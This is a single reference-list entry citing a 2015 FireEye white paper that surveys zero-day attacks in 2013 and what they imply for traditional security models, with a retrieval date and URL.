7. FireEye (2015). LESS THAN ZERO: A Survey of Zero-day Attacks in 2013 and What They Say about the Traditional Security Model. Retrieved 3 September 2015, from https://www.fireeye.com/resources/pdfs/white-papers/fireeye-zero-day-attacks-in-2013.pdf